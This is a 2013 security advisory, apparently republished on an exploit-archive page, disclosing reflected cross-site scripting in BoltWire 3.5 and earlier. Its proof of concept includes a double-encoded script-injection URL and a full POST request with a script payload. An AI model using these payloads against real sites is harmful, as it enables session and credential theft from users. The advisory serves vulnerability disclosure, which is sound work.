accept no compromises

BoltWire 3.5 Cross Site Scripting

BoltWire 3.5 Cross Site Scripting
Posted Oct 9, 2013
Authored by Manuel Garcia Cardenas | Site isecauditors.com

BoltWire versions 3.5 and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-2651
MD5 | 35e8dc586e2d3855a41950db9476c31b

BoltWire 3.5 Cross Site Scripting

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2013-010
- Original release date: March 20th, 2013
- Last revised: March 25th, 2013
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2013-2651
=============================================

I. VULNERABILITY
-------------------------
Multiple Reflected XSS vulnerabilities in BoltWire <= v3.5

II. BACKGROUND
-------------------------
BoltWire is an easy to use web development engine with surprizing
flexibility and power. It has

the various strengths of a wiki, cms, database, search engine, and more,
all rolled together into

a software system of ground-breaking design.

III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in BoltWire <=3.5 , that
allows the execution of

arbitrary HTML/script code to be executed in the context of the victim
user's browser.

The code injection is done through the parameter "p" and "content" in
the page index.php.

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the double encoding of the "p" parameter.

Malicious Request ("p" parameter):

Not vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=<script>alert("XSS")</script>
Not Vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=%3cscript%3ealert%28%22XSS

%22%29%3c%2fscript%3e
Vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=%253cscript%253ealert%2528%2522XSS

%2522%2529%253c%252fscript%253e

Malicious Request ("content" parameter):

POST /bolt/field/index.php?p=action.create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bf1bcm8370oqt84lh8nvrdklb7;
BOLTsession=bf1bcm8370oqt84lh8nvrdklb7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

target=example&content=</textarea><script>alert("XSS")</script>&submit=PREVIEW>

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, this can

leverage to steal sensitive information as user credentials, personal
data, etc.

VI. SYSTEMS AFFECTED
-------------------------
All Versions of BoltWire <= v3.5

VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of

transaction with them must be validated.

VIII. REFERENCES
-------------------------
http://www.boltwire.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Manuel García Cárdenas (mgarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
------------------------
March 20, 2013 1: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March 20, 2013: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 25, 2013: Sent to Devel Team.
October 09, 2013: After some months without feedback, we do a
full-disclosure

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or

guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse

of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security,

penetration testing, security compliance implementation and assessing.
Our clients include some

of the largest companies in areas such as finance, telecommunications,
insurance, ITC, etc.
We are vendor independent provider with a deep expertise since 2001. Our
efforts in R&D include

vulnerability research, open security project collaboration and
whitepapers, presentations and

security events participation and promotion. For further information
regarding our security

services, contact us.

XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2015

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    2 Files
  • 2
    Feb 2nd
    17 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    16 Files
  • 5
    Feb 5th
    14 Files
  • 6
    Feb 6th
    4 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2015 Packet Storm. All rights reserved.

close